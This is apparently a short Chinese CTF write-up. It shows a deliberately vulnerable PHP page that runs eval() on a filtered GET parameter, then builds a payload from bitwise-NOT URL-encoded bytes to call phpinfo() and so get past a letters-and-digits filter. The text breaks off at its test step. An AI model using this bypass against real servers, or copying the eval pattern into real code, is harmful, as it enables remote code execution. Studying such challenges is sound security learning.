RCE绕过：无字母数字webshell之命令执行

if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

 这道题分析：

1.webshell长度不超过35

2.正则过滤掉了数字字母还有$和_

因为禁止了$符号，所以我们无法构造PHP的变量。但是我们在查询资料得到PHP7中，它允许($a)()这样的方法来执行动态函数的，我们可以通过('phpinfo')();来执行函数，第一个括号中可以是任意PHP表达式。

因为不能使用字母，所以我们想到用url编码表示：

(%8F%97%8F%96%91%99%90)();

 在linux中~是表示反码，既就是取反。刚好加在前面就可以。所以我们得到：

(~%8F%97%8F%96%91%99%90)();

测试：